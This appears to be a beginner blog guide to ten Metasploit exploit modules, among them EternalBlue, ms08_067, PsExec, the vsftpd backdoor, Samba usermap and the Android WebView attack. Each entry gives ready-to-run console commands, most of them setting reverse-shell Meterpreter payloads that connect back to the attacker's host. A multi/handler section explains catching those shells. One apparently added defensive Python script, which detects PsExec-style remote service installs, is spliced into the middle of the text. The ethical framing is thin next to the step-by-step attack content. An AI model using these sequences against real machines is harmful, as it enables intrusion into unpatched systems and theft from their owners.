Top 10 Metasploit Exploits Every Ethical Hacker Should Know
Are you curious about how ethical hackers break into systems — legally and ethically? Metasploit is one of the most popular tools used in cybersecurity for testing and finding weaknesses in systems. Think of it like a hacking toolbox — it gives you everything you need to try out real-world attacks in a safe way.
In this beginner-friendly guide, we’ll look at the 10 most used Metasploit exploits. For each one, you’ll learn:
- What it is
- What it does (in plain English)
- How to use it step-by-step
Whether you’re studying cybersecurity, doing a Capture the Flag (CTF), or just learning for fun, this guide will help you get started with confidence.
1. EternalBlue (ms17_010_eternalblue)
CVE: CVE-2017-0144
What It Does: Targets a bug in Windows file sharing and gives you remote control of the system — no login needed.
Famous For: The WannaCry ransomware attack
Command Example:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Why It’s Useful: You get full access to the target system without needing a username or password.
2. NetAPI Buffer Overflow (ms08_067_netapi)
CVE: CVE-2008-4250
What It Does: Crashes an old Windows service in a way that lets you run your own code.
Command Example:
use exploit/windows/smb/ms08_067_netapi
set RHOST <target-ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Why It’s Useful: Still works on outdated systems and is great for learning.
3. PsExec (psexec)
What It Does: Lets you run commands on a Windows machine if you already have a valid username and password.
Command Example:
use exploit/windows/smb/psexec
set RHOST <target-ip>
set SMBUser <username>
set SMBPass <password>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Why It’s Useful: Excellent for moving deeper into a network once you’ve cracked one machine.
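A defender's view of the PsExec entry above: authenticated remote execution of this kind shows up on the target as a network logon followed shortly by a new service being installed. The sketch below is an added example, not code from the original article; it correlates Windows event 4624 (logon type 3) with event 7045 (service installed), and the event dictionaries, field names and host names are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from a real host). Field names are assumptions
# modelled on Windows Security 4624 and System 7045 records.
EVENTS = [
    {"time": "2024-05-01T10:00:00", "host": "WS01", "id": 4624, "logon_type": 3,
     "user": "CORP\\svc_backup", "src_ip": "10.0.5.23"},
    {"time": "2024-05-01T10:00:04", "host": "WS01", "id": 7045,
     "service": "kXwQpLzR", "image_path": "%SystemRoot%\\kXwQpLzR.exe"},
    {"time": "2024-05-01T11:30:00", "host": "WS02", "id": 4624, "logon_type": 3,
     "user": "CORP\\alice", "src_ip": "10.0.5.40"},
    {"time": "2024-05-01T14:00:00", "host": "WS02", "id": 7045,
     "service": "Acme Updater", "image_path": "C:\\Program Files\\Acme\\upd.exe"},
    {"time": "2024-05-01T15:00:00", "host": "WS03", "id": 4624, "logon_type": 2,
     "user": "CORP\\bob", "src_ip": "-"},
    {"time": "2024-05-01T15:00:02", "host": "WS03", "id": 7045,
     "service": "PrintHelper", "image_path": "C:\\Windows\\System32\\ph.exe"},
]


def find_remote_service_installs(events, window_seconds=60):
    """Pair each 7045 service install with a network logon (4624, type 3)
    seen on the same host within the preceding window."""
    window = timedelta(seconds=window_seconds)
    last_net_logon = {}  # host -> (timestamp, event) of latest type-3 logon
    alerts = []
    # ISO-8601 timestamps in one format sort correctly as strings.
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4624 and ev.get("logon_type") == 3:
            last_net_logon[ev["host"]] = (when, ev)
        elif ev["id"] == 7045:
            seen = last_net_logon.get(ev["host"])
            if seen and when - seen[0] <= window:
                logon = seen[1]
                alerts.append({"host": ev["host"], "service": ev["service"],
                               "image_path": ev["image_path"],
                               "user": logon["user"], "src_ip": logon["src_ip"],
                               "delay_s": (when - seen[0]).total_seconds()})
    return alerts


if __name__ == "__main__":
    for alert in find_remote_service_installs(EVENTS):
        print(alert)
```

The interactive logon on WS03 and the hours-later install on WS02 are ignored; legitimate remote software deployment produces the same pairing, so alerts need an allowlist of known management accounts and source hosts.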
4. Java Signed Applet (java_signed_applet)
What It Does: Creates a fake Java pop-up. If the user clicks “Run,” you gain access to their system.
Command Example:
use exploit/multi/browser/java_signed_applet
set SRVHOST <your-ip>
set URIPATH /
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Why It’s Useful: Great example of combining hacking with social engineering.
5. Multi/Handler (multi/handler)
What It Does: It doesn’t hack anything directly. It waits for a hacked system to call you back.
Command Example:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>
set LPORT <port>
exploit
Why It’s Useful: Must-have for receiving reverse shells after sending a payload.
6. VSFTPD Backdoor (vsftpd_234_backdoor)
What It Does: Targets a secret backdoor in a specific version of an FTP server used on Linux.
Command Example:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST <target-ip>
exploit
Why It’s Useful: Easy way to get a shell on a vulnerable machine. Common in practice labs.
7. phpMyAdmin LFI (phpmyadmin_lfi_rce)
What It Does: Uses a flaw in phpMyAdmin to run your code on the web server.
Command Example:
use exploit/multi/http/phpmyadmin_lfi_rce
set RHOST <target-ip>
set TARGETURI /phpmyadmin
exploit
Why It’s Useful: Useful for attacking poorly configured web servers.
8. HFS Remote Code Execution (rejetto_hfs_exec)
What It Does: Takes advantage of a bug in an old Windows file server to run your own code.
Command Example:
use exploit/windows/http/rejetto_hfs_exec
set RHOST <target-ip>
set TARGETURI /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Why It’s Useful: Easy shell access. Often used in CTF and training challenges.
9. Samba Usermap Script (samba_usermap_script)
What It Does: Attacks Linux file-sharing services that are misconfigured, letting you run commands.
Command Example:
use exploit/multi/samba/usermap_script
set RHOST <target-ip>
set PAYLOAD cmd/unix/reverse
set LHOST <your-ip>
exploit
Why It’s Useful: No need for login. Works on vulnerable Linux systems.
10. Android WebView Exploit (webview_addjavascriptinterface)
What It Does: Lets you control Android phones running old apps with insecure browser settings.
Command Example:
use exploit/android/browser/webview_addjavascriptinterface
set SRVHOST <your-ip>
set URIPATH /
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
Why It’s Useful: Shows how mobile devices can be hacked through malicious websites.
Metasploit is a great tool for learning how hackers think and act — but always use it ethically and legally. If you’re new to cybersecurity, start with safe environments like TryHackMe, Hack The Box, or your own virtual machine setup.
These 10 Metasploit exploits are not only commonly used, but also essential for building hands-on skills in ethical hacking.